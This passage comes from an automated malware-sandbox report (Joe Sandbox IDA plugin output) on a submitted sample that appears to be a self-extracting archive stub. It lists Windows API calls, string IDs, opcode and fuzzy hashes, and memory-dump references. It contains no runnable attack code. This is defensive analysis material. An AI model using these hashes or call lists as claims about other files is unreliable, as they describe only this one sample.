        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
        • API String ID: 667068680-1718035505
        • Opcode ID: a2fbf01380595e548f957efb5db634d5f745e484e909a015938aebbc751443f3
        • Instruction ID: c52678043a5182fb2915eedac14b8d35714aaa8f7789e2d70b21afa04d8200dc
        • Opcode Fuzzy Hash: a2fbf01380595e548f957efb5db634d5f745e484e909a015938aebbc751443f3
        • Instruction Fuzzy Hash: C2F02233B01222DBCB204EA44C859AA72889B01752BA5053DFA20D7A80E320CDC757D0
        APIs
        • SystemTimeToFileTime.KERNEL32(?,?), ref: 001327E1
          • Part of subcall function 0012C619: GetVersionExW.KERNEL32(?), ref: 0012C63E
        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00132805
        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0013281F
        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00132832
        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00132842
        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00132852
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Time$File$System$Local$SpecificVersion
        • String ID:
        • API String ID: 2092733347-0
        • Opcode ID: 6f93ba9a74c35fda22fab8ef6a25e050790066fa7a64f42ea9f6f6cd67c14d86
        • Instruction ID: 98a4b45c1044fa6feb2fe3e4b2b6650d6f5637be5ae31825e0fea6b8bc02851f
        • Opcode Fuzzy Hash: 6f93ba9a74c35fda22fab8ef6a25e050790066fa7a64f42ea9f6f6cd67c14d86
        • Instruction Fuzzy Hash: DB31EA75108355ABC704DFA8D88499BB7F8BF98714F00591EF999C3610E730E585CBA6
        APIs
        • GetLastError.KERNEL32(?,?,00143C71,00143A2C,00140BE4), ref: 00143C88
        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00143C96
        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00143CAF
        • SetLastError.KERNEL32(00000000,00143C71,00143A2C,00140BE4), ref: 00143D01
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorLastValue___vcrt_
        • String ID:
        • API String ID: 3852720340-0
        • Opcode ID: 353ca0d0bd8cdf92780d8c14c11323e6c3a34d7654ac83753a2f010b935debf3
        • Instruction ID: 79dd2a20b935a878f4fe5e8c996bc17573c854cbdc35a7180f3e4605761e5886
        • Opcode Fuzzy Hash: 353ca0d0bd8cdf92780d8c14c11323e6c3a34d7654ac83753a2f010b935debf3
        • Instruction Fuzzy Hash: A201F7336093216FB71927B87CC6B6B3A58EB15B79B70032AF630B64F0EF915D405580
        APIs
        • GetLastError.KERNEL32(?,00163070,00145972,00163070,?,?,00145271,00000050,?,00163070,00000200), ref: 0014A509
        • _free.LIBCMT ref: 0014A53C
        • _free.LIBCMT ref: 0014A564
        • SetLastError.KERNEL32(00000000,?,00163070,00000200), ref: 0014A571
        • SetLastError.KERNEL32(00000000,?,00163070,00000200), ref: 0014A57D
        • _abort.LIBCMT ref: 0014A583
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorLast$_free$_abort
        • String ID:
        • API String ID: 3160817290-0
        • Opcode ID: 5de12eb2dc176ee40b64ce472c7c35a6025bb63a1d764d58dfcf647c3f76d121
        • Instruction ID: 22cf0d86415112470d7ccc9d2af14b94fa54426fbc81036eb484ec932bd9e6ae
        • Opcode Fuzzy Hash: 5de12eb2dc176ee40b64ce472c7c35a6025bb63a1d764d58dfcf647c3f76d121
        • Instruction Fuzzy Hash: AAF0283A1C0600A7C20633787E0AB6B2D659FE1731FB70018F618EA1B2FF718D819957
        APIs
        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0013ED87
        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013EDA1
        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0013EDB2
        • TranslateMessage.USER32(?), ref: 0013EDBC
        • DispatchMessageW.USER32(?), ref: 0013EDC6
        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0013EDD1
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
        • String ID:
        • API String ID: 2148572870-0
        • Opcode ID: abcd87a92b731c688dccc091e077d2bf122d474fc5e88beb3104cab4ce1bffc5
        • Instruction ID: 33b3ad87dc816b00f79c366c60d3f6e8faccc897df433f87cd659a519b1a7442
        • Opcode Fuzzy Hash: abcd87a92b731c688dccc091e077d2bf122d474fc5e88beb3104cab4ce1bffc5
        • Instruction Fuzzy Hash: 6BF03772A01219ABCB206BA1EC4CDCF7FAEEF42791F108021B60BD6490D6348695CBE0
        APIs
          • Part of subcall function 00131900: _wcslen.LIBCMT ref: 00131906
          • Part of subcall function 0012CD5C: _wcsrchr.LIBVCRUNTIME ref: 0012CD73
        • _wcslen.LIBCMT ref: 0012D5A4
        • _wcslen.LIBCMT ref: 0012D5EC
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen$_wcsrchr
        • String ID: .exe$.rar$.sfx
        • API String ID: 3513545583-31770016
        • Opcode ID: c625d2748296bbb84bc811c16aaa2e660608d66fe19be7cffcfcb3ceeed99a47
        • Instruction ID: 5410103a96e8711a84b4f4b9918a280563d59754f679c2f724ff5b10737b52a8
        • Opcode Fuzzy Hash: c625d2748296bbb84bc811c16aaa2e660608d66fe19be7cffcfcb3ceeed99a47
        • Instruction Fuzzy Hash: 5B414822504330AAC735AF74F842A7FB3B8EF6474DF15490EF9969B181E7A08DA1C395
        APIs
        • GetTempPathW.KERNEL32(00000800,?), ref: 0013DFD0
          • Part of subcall function 0012CAA0: _wcslen.LIBCMT ref: 0012CAA6
        • _swprintf.LIBCMT ref: 0013E004
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • SetDlgItemTextW.USER32(?,00000066,00172892), ref: 0013E024
        • EndDialog.USER32(?,00000001), ref: 0013E131
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
        • String ID: %s%s%u
        • API String ID: 110358324-1360425832
        • Opcode ID: cddc27c9b859f265cf611556eaaca05d8b09fddc23a8ba3a19d394d6e398cd0b
        • Instruction ID: 64eed1eb185553ff328cfec5b1d1d36580be6c8d51b7fd2abb12af2082482251
        • Opcode Fuzzy Hash: cddc27c9b859f265cf611556eaaca05d8b09fddc23a8ba3a19d394d6e398cd0b
        • Instruction Fuzzy Hash: 50415E75900258AADF25DBA0DC45EEE77FCEB14704F4080A6F90DA7091EF719A858F61
        APIs
        • _wcslen.LIBCMT ref: 0012CF56
        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0012B505,?,?,00000800,?,?,0012B4CA,?), ref: 0012CFF4
        • _wcslen.LIBCMT ref: 0012D06A
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen$CurrentDirectory
        • String ID: UNC$\\?\
        • API String ID: 3341907918-253988292
        • Opcode ID: da0780a5669bcd76bc4a6ad4a348db676ba1e6ca8efeeab01de7b59dbbb99cd5
        • Instruction ID: 6ddb8f6ca157e8af4b60dcec6fb37a51ef25e04641fac09416ac7a3f55d3c67f
        • Opcode Fuzzy Hash: da0780a5669bcd76bc4a6ad4a348db676ba1e6ca8efeeab01de7b59dbbb99cd5
        • Instruction Fuzzy Hash: 14411631440239BBCF21AF20FC01EEE73A9EF14395F244025F864A7061E770D9A2CBA5
        APIs
        • LoadBitmapW.USER32(00000065), ref: 0013C8CD
        • GetObjectW.GDI32(00000000,00000018,?), ref: 0013C8F2
        • DeleteObject.GDI32(00000000), ref: 0013C924
        • DeleteObject.GDI32(00000000), ref: 0013C947
          • Part of subcall function 0013B6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0013C91D,00000066), ref: 0013B6D5
          • Part of subcall function 0013B6C2: SizeofResource.KERNEL32(00000000,?,?,?,0013C91D,00000066), ref: 0013B6EC
          • Part of subcall function 0013B6C2: LoadResource.KERNEL32(00000000,?,?,?,0013C91D,00000066), ref: 0013B703
          • Part of subcall function 0013B6C2: LockResource.KERNEL32(00000000,?,?,?,0013C91D,00000066), ref: 0013B712
          • Part of subcall function 0013B6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0013C91D,00000066), ref: 0013B72D
          • Part of subcall function 0013B6C2: GlobalLock.KERNEL32(00000000), ref: 0013B73E
          • Part of subcall function 0013B6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0013B762
          • Part of subcall function 0013B6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0013B7A7
          • Part of subcall function 0013B6C2: GlobalUnlock.KERNEL32(00000000), ref: 0013B7C6
          • Part of subcall function 0013B6C2: GlobalFree.KERNEL32(00000000), ref: 0013B7CD
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
        • String ID: ]
        • API String ID: 1797374341-3352871620
        • Opcode ID: 675e91177a3769553ed36d29c6b67c3681868898b8e9e3641acd0594793fbaef
        • Instruction ID: 2fcf49234ae817d3faee55723c30c6ec7e2e267ddfe87d228fdb8bd696772bd5
        • Opcode Fuzzy Hash: 675e91177a3769553ed36d29c6b67c3681868898b8e9e3641acd0594793fbaef
        • Instruction Fuzzy Hash: E701D23290071567DB1167749C4ABBF3ABBDF91B65F160010FA00B72A2EF618D0597E0
        APIs
          • Part of subcall function 001212F6: GetParent.USER32(?), ref: 0012132A
          • Part of subcall function 001212F6: GetDlgItem.USER32(00000000,00003021), ref: 0012133A
          • Part of subcall function 001212F6: SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        • EndDialog.USER32(?,00000001), ref: 0013E78B
        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0013E7A1
        • SetDlgItemTextW.USER32(?,00000066,?), ref: 0013E7B5
        • SetDlgItemTextW.USER32(?,00000068), ref: 0013E7C4
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ItemText$DialogParentWindow
        • String ID: RENAMEDLG
        • API String ID: 364370097-3299779563
        • Opcode ID: 3506db5854a7ace5e7543fc6a1b935c28405f9da4d74d6d2439089395de0b45e
        • Instruction ID: 239cbc2e00a316b6755415f249a494c78c39315b718cba1baf1453cd78818538
        • Opcode Fuzzy Hash: 3506db5854a7ace5e7543fc6a1b935c28405f9da4d74d6d2439089395de0b45e
        • Instruction Fuzzy Hash: 1801D433280310BBE6118B649C4DF677BDEFB69B02F100411F302A64D0C7A26A558BF5
        APIs
        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001491D6,00000000,?,00149176,00000000,0015D570,0000000C,001492CD,00000000,00000002), ref: 00149245
        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00149258
        • FreeLibrary.KERNEL32(00000000,?,?,?,001491D6,00000000,?,00149176,00000000,0015D570,0000000C,001492CD,00000000,00000002), ref: 0014927B
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: ed193f1faacb63baac98f4850d5e5c49d6f17c41c0fb0ae5300fd8b08b052758
        • Instruction ID: 316ca8fc0cd5f1093df03783f332f09acf6cc26dd0444b4d0d80318755bd5235
        • Opcode Fuzzy Hash: ed193f1faacb63baac98f4850d5e5c49d6f17c41c0fb0ae5300fd8b08b052758
        • Instruction Fuzzy Hash: 61F04F34A10218FBDF119BA4EC09FAEBFB4EF04716F0001A5F905BA5A0DB705EC4CA90
        APIs
          • Part of subcall function 00131B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00131B4F
          • Part of subcall function 00131B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00130633,Crypt32.dll,00000000,001306AD,00000200,?,00130690,00000000,00000000,?), ref: 00131B71
        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0013063F
        • GetProcAddress.KERNEL32(0016A1F0,CryptUnprotectMemory), ref: 0013064F
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AddressProc$DirectoryLibraryLoadSystem
        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
        • API String ID: 2141747552-1753850145
        • Opcode ID: 04778ff9b2f9e7c46378a6a712ec7d4debb001d00447ab9d76fd6702b03acbef
        • Instruction ID: feebb791d898520b38b5e50d279d26fcaeadeb79383d536b3d9c4a89628268ed
        • Opcode Fuzzy Hash: 04778ff9b2f9e7c46378a6a712ec7d4debb001d00447ab9d76fd6702b03acbef
        • Instruction Fuzzy Hash: 9DE026B0805340DFD7215F349809B42BFE05F2870AF00880DFAD597580D7B0C0C48B00
        APIs
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AdjustPointer$_abort
        • String ID:
        • API String ID: 2252061734-0
        • Opcode ID: 468bacfc350c9c96c055382ddf1f8263f6243b6c3b06ba321d505d399890733a
        • Instruction ID: 674a5894659ddffd17342afbd17c7cf1013bb4341af1fb4ef5f3646488fc1450
        • Opcode Fuzzy Hash: 468bacfc350c9c96c055382ddf1f8263f6243b6c3b06ba321d505d399890733a
        • Instruction Fuzzy Hash: AF510771A02206AFEF299F54D845BBA77A4EF50310F14452DEC26A72B1E731EE80CB90
        APIs
        • GetEnvironmentStringsW.KERNEL32 ref: 0014D0E9
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0014D10C
          • Part of subcall function 0014A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014DBDC,00000000,?,001480A1,?,00000008,?,0014A861,?,?,?), ref: 0014A820
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0014D132
        • _free.LIBCMT ref: 0014D145
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0014D154
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
        • String ID:
        • API String ID: 336800556-0
        • Opcode ID: 74a4735917ede0b702fd1e4b082ca40e074ac18b315bf5bc617d0ad70a75faea
        • Instruction ID: 13552c8a16dc4c4d6aca627e6367dba95aedf5ce8ffcbeb771623ea3ade28a90
        • Opcode Fuzzy Hash: 74a4735917ede0b702fd1e4b082ca40e074ac18b315bf5bc617d0ad70a75faea
        • Instruction Fuzzy Hash: FE01A272602615BF2B211BB67C8CC7B6A6DEFD2FA67150139FD04C7220EB709C8281B1
        APIs
        • GetLastError.KERNEL32(?,00163070,00000200,0014A7E0,00147586,?,?,?,?,0012ECA4,?,02FB3C18,00000064,00000004,0012EA30,?), ref: 0014A58E
        • _free.LIBCMT ref: 0014A5C3
        • _free.LIBCMT ref: 0014A5EA
        • SetLastError.KERNEL32(00000000,00154ADC,00000050,00163070), ref: 0014A5F7
        • SetLastError.KERNEL32(00000000,00154ADC,00000050,00163070), ref: 0014A600
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorLast$_free
        • String ID:
        • API String ID: 3170660625-0
        • Opcode ID: 987aab1d4aeb6433178acb8c9776fa35e8a7a7772737608c97067d2614f5089b
        • Instruction ID: fe0997f312e2b80fef70c09c62d82455e79c45cc4e439d3fe10bf8834e0383c4
        • Opcode Fuzzy Hash: 987aab1d4aeb6433178acb8c9776fa35e8a7a7772737608c97067d2614f5089b
        • Instruction Fuzzy Hash: A50144362C5601A7821627746E49D5B212E9FE03713B30028F9089B1B1FF708E815062
        APIs
        • _free.LIBCMT ref: 0014D9C7
          • Part of subcall function 0014A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC), ref: 0014A670
          • Part of subcall function 0014A65A: GetLastError.KERNEL32(00154ADC,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC,00154ADC), ref: 0014A682
        • _free.LIBCMT ref: 0014D9D9
        • _free.LIBCMT ref: 0014D9EB
        • _free.LIBCMT ref: 0014D9FD
        • _free.LIBCMT ref: 0014DA0F
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
